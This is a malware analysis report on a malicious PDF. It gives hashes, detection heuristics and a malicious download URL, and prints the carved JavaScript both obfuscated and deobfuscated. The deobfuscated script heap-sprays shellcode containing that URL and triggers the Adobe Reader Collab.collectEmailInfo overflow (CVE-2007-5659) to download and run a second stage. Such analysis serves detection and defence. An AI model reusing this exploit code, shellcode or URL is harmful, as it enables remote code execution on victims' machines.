Malicious PDF — malware analysis report

Static analysis result for SHA-256 e6807dcb72987509…

MALICIOUS

PDF

4.6 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 7e3f5475790ec3564b756d373ffb546a SHA-1: a6740be114066d127a73ebdaaa419c9e806b2aa9 SHA-256: e6807dcb72987509e547561e304583d5d3842b3148138ec9fff88886458e97ca
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious JavaScript. The extracted JavaScript stream, javascript_obj0013_001.js, is likely responsible for executing a second-stage payload, though its exact function is obscured by obfuscation. The file's authoring application is Scribus, but this does not negate the suspicious JavaScript content.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function RR1HDFR(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function SIIbyB7l5Un9Au(org9wJCHs8RXQV){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(org9wJCHs8RXQV)"+";"+"}");eval("function r93aLXndwOi(SvxLXFOnP){var LYuAfJ4E="+"0,gYaUIzy1c=SvxLXFOnP.l"+"en"+"gth,GeDUC1=10"+"2"+"4,xOqzql,xICa7c,gAX5TW3T0f='',Rs81tEAI509p7=LYuAfJ4E,rJuFvr=LYuAfJ4E,COtZvw=LYuAfJ4E,pbgsU=Ar"+"ra"+"y(63,1,27,15,39,40,36,35,10, …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/exp/load.php?id=5655&spl=4 Referenced by PDF JavaScript

Related samples 8

Ranked by shared artifacts, heuristics, extracted URLs, CVEs, and signatures.

Full JSON: related samples API

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x365 6250 bytes
SHA-256: 833e7ddb4baaa8658ee35d13b3d4b94fa4b547cd1bfba85ebd50190496e46052
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 169 of 242 identifiers look randomly generated (e.g. 'OqCTEkDethGxOAgDu65JK732Kq_UZn'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function RR1HDFR(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function SIIbyB7l5Un9Au(org9wJCHs8RXQV){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(org9wJCHs8RXQV)"+";"+"}");eval("function r93aLXndwOi(SvxLXFOnP){var LYuAfJ4E="+"0,gYaUIzy1c=SvxLXFOnP.l"+"en"+"gth,GeDUC1=10"+"2"+"4,xOqzql,xICa7c,gAX5TW3T0f='',Rs81tEAI509p7=LYuAfJ4E,rJuFvr=LYuAfJ4E,COtZvw=LYuAfJ4E,pbgsU=Ar"+"ra"+"y(63,1,27,15,39,40,36,35,10,7,0,0,0,0,0,0,19,38,25,20,3,30,2,53,0,8,43,28,62,49,45,44,48,29,26,6,18,31,22,9,13,17,61,0,0,0,0,4,0,23,47,46,54,58,52,11,32,21,41,37,5,24,50,14,34,51,55,16,57,12,42,33,59,60,56);f"+"o"+"r(xICa7c=M"+"at"+"h.c"+"ei"+"l(gYaUIzy1c/"+"GeDUC1)"+";xICa7c>LYuAfJ4E;xICa7c-"+"-){fo"+"r(xOqzql=Ma"+"th.m"+"in(gYaUIzy1c,GeDUC1);xOqzql>LYuAfJ4E;xOqzql-"+"-,gYaUIzy1c-"+"-){COtZvw|"+"=(pbgsU[SvxLXFOnP.cha"+"rCod"+"eAt(Rs81tEAI509p7+"+"+)-48])<"+"<rJuFvr;if(rJuFvr){gAX5TW3T0f+"+"=SIIbyB7l5Un9Au"+"(163^COtZvw&"+"2"+"5"+"5);COtZvw>"+">="+"8;rJuFvr-"+"="+"2;}el"+"se{rJuFvr="+"6"+";}}"+"}return (gAX5TW3T0f);}var DO34g7DowK06d=implode('',['DVNPY3InfbN','Z1U','yhEomqS@Zh','p9QfFJZp8pthl2','QqHUNnuryhq','9yk','BDtpG0Lei@','3','tT','gbd@','Dy7','DEOG','H@jx2aofi4OZ','eg','bpDpZhCbOn32yh','gV0xJaXZ6gNyR','3XPX','LOMX@yGg4m6','UEOGH@jx','2aofi4','OZe','gb','pm','a0','xJaX','Z6gNyR3XPDp5','4DV0x','J','aXZ6gNyR3','XPmeZhG0L','ei@3tTgb','d@DyhE','omZb','bEGf@cf','n','JZfHrIfV9ufa9','Nn','X@yp@LzMVDu','kcbQ','t','sa','Q','nd','Jby','u','Sjp','m','omfSUNG','YryhG0','Lei','@3tTgbd@Du','ADeZhl2QqHUNnuryhH2bL','hxO','zgvzh','m','3','m','GF9ZhFaj','k5@Z','hEo','z623WP@Fy6','H3WPmomGF9','ZhG','xOAgDu65J','yhEo5GX','2u','fHgyfSbm','hS','RZksE','W6SRZks','EW6SRZksEW6S','RZ6k2EzSR','X6sRBzSRQ','ki','FcASRZA@ScASRZA@oj6S','RN','tkDW6S','RNtY','EW','6SRNtwacz','S','RNt2ojkSRQtk2ozS','RQtka','EtSRZAw@B','tSRZtkUjtSRNt','k2Et','SRQkaREtSRN','ts8EtSR','NA','katkSRZ','kY','Vo6SRN','Aka','t','kSRQkA2okS','RNtk3W6','SRNtk','2E','z','SRQ','kaRE','tSRQzRoW6SRQkTc','Wk','S','RNtT','8c6SRZ6','CoW6S','RNtkgj6SR','Ntk2EtSRN','z','p','aBkSRQzRR','EzSRXk','CcWkSRQkV8j6SRZ','6CRc6SRNtkgBtSRNtk2Et','SR','N','z','paB','kSRQzRR','okSRXzpbWkSRN6@RBt','SRZ6C','SttSRNtk3ttSRNt','k2','E','tSRNzpaB','kS','RQzRRo6S','RZ','6@','cWkS','RZ','6','k9j','6SRZ6CcBtSR','NtkD','B','zSRN','t','k2','E','tSRNzpaBk','SRQzRVEtSR','Q','6AbWkSR','Z6pJBkSRZ6','C','RWkSR','Ntk9jASRNtk2EtS','RNzpaBkSR','NzkaEzSRZtCVBtSRNAp9','WzSR','Qk','i8jkS','RQtC8cz','SRNt2oB','kS','RNtk','2ctSRQ','zTR','EtSR','NApaB','kSR','Q','kaFEzSRNtwgczSRN','tAbjkSRQkaSEkSR','QtCScz','SRZ6','CScASRNtkat','k','S','RNtk','2EtSRZACSEtSRQtVEcASRNA','kDL6SR','Xk','2oW','kSRNtk2E','tSRQkiREt','SRQts','8','cz','SRQ6patkSRQ','6kaWz','SRQkiSEtSRXzk','gczS','RN','6@cWkSR','Nt','k2Et','SR','Qzk2Et','SR','NzpatkSRZA','VVE','zSRQziRLtSRQzpatkS','RZ6CVok','SRNtkbjtSR','Ntk2Et','SRNzp2ozSRQ62F','EtSRQzsREt','SRXz','Tvj6SR','Q62','cjzSRNt','wgE','t','SR','ZA','pJWk','SRNt','k2','EtSR','NApgt6SRQ','k','a','FEtSRNt','s8czSRNtA','bj','kSR','Q','k','aSE','kSRQ','tCSczS','RNz','k3Wk','S','RNtk2EtSR','ZAVREtSR','QzCRLASRNz','p','2ozSRZthDEzSRQzhD','tk','SRN','6@Soz','SRXzk','JjzSRQzh9EtSRNzpat','kSRZAVVo6SRQziRczSRQzpat','kSRZ6CVo','kSRNtkDozSRNtk2EtSRN','tkbjkSRNApgt','6','S','RQ','kaFEtSRNtC8c','zSRNt4bjk','SRQkaS','EkSRQtCS','czSRQ','t','k3WkSR','Ntk2EtSRZA','VRE','tSRQ','k','a','8t6SRQ','tkgcz','S','R','NtAbj','kSRQ','kaSEk','SRQtCSczSRNt','k3','WkSRNt','k2E','tSRNzA2Et','SRQz','49LkSRZ6','A2oz','SRZ6A2ozS','RZ6A2o','z','S','RZ6','A2ozS','RZ','6sVWzS','RQz','VRE','zSRQkaSozS','R','Z','64D','jkSRQ','z','4g','t','ASRZ6kgt6SRQkaSc','zSRQkaoW6S','RNtCvB6SRQ','zY','VtkS','RQzR','Ro6SRNAh','atkSRQ','kaEo6SRQtTvBzSR','NthJWkSRQzR8Wz','S','RNARVtkSRNthDE','tS','RZt','hgWzSRNziS','BkSRZ','kY8ctSRQ','6','h2o','zSRZt','h9cAS','RNt@8j','ASRQtk2j6SRN','64UckSRNtCvBzSRQ','6TSj','t','SRNth','2','E6','SRNzk','gtt','SR','N6A3tkSRN6','TELkS','RNAp9c6S','RQzVojzS','RZ6','aVtkSRQzVVt','kSRNthD','Ez','SRZARF','B6','SRNtsVt','kSRQka8Lk','SR','QtsSckSR','X6YRozSRNtw','atkSRNt','hatkSRQzTS','jzSRQ','649E6SRNtk2okSRN6w','3Wk','SRN6@8j6SRQzpgt6S','RNzs','SLtSRNz','@8E6','SRNt','kgc','6SRXkaVtASRXk@Ttk','SR','Q6','k','DjzSRQkTS','BtS','RQkYVB6SRX6RFj','6S','RQ6ADB','6SR','QkAaW','6S','RQk','VSBtSRXk@T','t','ASR','Qkh9BtSRQ','kTVBtS','RQ6AatkSRQk2Tt6SRX6k@t','6SRQkaVjASR','X6V','Ft','tSRX6VFB','kSRQ6iFjkSRXk@TW6SR','X64aWzSRZ6','@Ft','k','1vI','ADVNPY3zLi9yGRdck_3','54D','otda','ot6@o','t6m','omGF','9ZhV0','OqCTEkDethGxOAgDu65JK732Kq_UZn','DAzhYp','t','higKf','DEOGH@j','x2ao','fi4OZeg0h','EozLi9yGRd','c','k_','357Dc','5G3xu','k6aW','p@cX6','2','vI','ADVNPY3mZbbEG','f@cfnJ','ZfH354DRQqS','DXP','F3NM','gS5wVJt6RojwV','Jt','6','RoBh','8p','t','hG0Lei@3t','Tgbd@D','y','hE','ozy1','UBdscmZb','bEGf@cfnJZf','H','0zh','9','2XPCeLd','kDQGW2bL','nJIADVNPY3z','eoa','U','y2EcfngLhEo','zpFajk5@Zhooz62Ut6@ot6@vI','7','xaQPaJBxVT','uAD','Vuq','Y3zpig','KfDTLdJUoMo0O4@pWt2b','Lt','_xyq','Uc','cqG9','0A4','gN','yp7Wt2bLt_xyqI','p5pDpZ','h','I@','0','dd9yMz@LdJUoMo0','O0D','et','hG0Le','i@3tTgbd@DyhIomZo','JtnHDWe87thE35rDVO','GXDyG8qKqDeE','fi3Ud6','0cPpUb','dgvz','hm3m','GF','9','Z','h5','g3xi','DEZDet','hF3ZfXVNnS@NMYabMYDN','nurK','7','aquya9NnX','@yp8p','th','5g3xiDEZDet','h5g3x','iDE','ZX','SNM@','0','OPH2y','puL0t','uTy71S5p','momGF9Zh6q','EPiE','Zk','h3','54D','dOM','C35z','Y','9NPRbIenqEGhaU7H','bOP','Y','gLGgojp3pcyOa','XzG','r','IP','ggKfpUZpTvz75g','3xiDE','Z','XFynF9Nzabm68vI','ADvKM','Dczp6','qEPiEZ','kh706L354EozADVmwDcz','p','6qEPiE','Zk','h7b6','L354','Eo56DVmw','DTox1a','tGaFo','LYe0hUom','68','o','zrU','3ItO9K','kaUWzzgj0DL','thTv5p','DLZrD','cItO','9KkaUWz','z3j0Dej','4D','TthlVzh6qEPi','EZkh7b6L','3z4D8jpDLZrDcI','t','O9K','kaU','Wz','z3j0','DLthCv5','pDpZhH2','bLhxOzgv','IADVNPY3zqHJo663jd','l','3jtTAuxd354DRQq','SDXPF3NMgS5wV3WP@FOwV3WP','@','FKh8pt','hCb','On32yp3DOesTL6Ray6A','gBnO2U73','2Kq_UZn','DL','thaEjAVSjpDLuPvDW','t','@','vQ','M@Rc6WqcZDp54DLuPvDW','t','@vQM@R','c','6WqcZmozGgJufX','Fuq30OP1','D0Gu9NMDet','hhqyq3gK','PXFuq30OMHUNt','ogOn','3JE','qlqypmDNG14KAD','Smh3euf_4th3D','OesTL6Ray6Ag','BnO2br8pthE','35rDeEfi3Ud','60cPp','Ubdgv','IA']);");eval(r93aLXndwOi(DO34g7DowK06d));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x365 2547 bytes
SHA-256: 17002ef5ff1b0221154572269b1ff3345a9f8d32e3ebfda1bf917324caff2d15
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var kWxUbd = new Array(); function Pb4z3(VLHvWGqQypc, duc7MxFsvjUYQ) { while (VLHvWGqQypc.length*2<duc7MxFsvjUYQ){VLHvWGqQypc += VLHvWGqQypc;} VLHvWGqQypc = VLHvWGqQypc.substring(0,duc7MxFsvjUYQ/2); return VLHvWGqQypc; } function cUYCmA() { var a65Kw = 0x0c0c0c0c; var Vm9hc3Ki = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u353D%u3536%u2635%u7073%u3D6C%u0034"); var Xvbt9N5g = 0x400000; var ulm7G6 = Vm9hc3Ki.length * 2; var duc7MxFsvjUYQ = Xvbt9N5g - (ulm7G6+0x38); var VLHvWGqQypc = unescape("%u9090%u9090"); VLHvWGqQypc = Pb4z3(VLHvWGqQypc, duc7MxFsvjUYQ); var HmVR8DqQA = (a65Kw - 0x400000)/Xvbt9N5g; for (var GxHDgml=0;GxHDgml<HmVR8DqQA;GxHDgml++) { kWxUbd[GxHDgml] = VLHvWGqQypc + Vm9hc3Ki; } } function MrvPzGLaATy() { var KQOvCV = app.viewerVersion.toString(); KQOvCV = KQOvCV.replace(/\D/g,""); var GOb6t4C = new Array(KQOvCV.charAt(0),KQOvCV.charAt(1),KQOvCV.charAt(2)); if ((GOb6t4C[0] == 8 && ((GOb6t4C[1] == 1 && GOb6t4C[2] < 2) || GOb6t4C[1] < 1)) || (GOb6t4C[0] == 7 && GOb6t4C[1] < 1) || (GOb6t4C[0] < 7)) { cUYCmA(); var lcI3G0yf0E1jOU = unescape("%u0c0c%u0c0c"); while(lcI3G0yf0E1jOU.length < 44952) lcI3G0yf0E1jOU += lcI3G0yf0E1jOU; this.collabStore = Collab.collectEmailInfo({subj: "",msg: lcI3G0yf0E1jOU}); } } MrvPzGLaATy();

Open this report in the interactive analyzer, or submit your own file for analysis.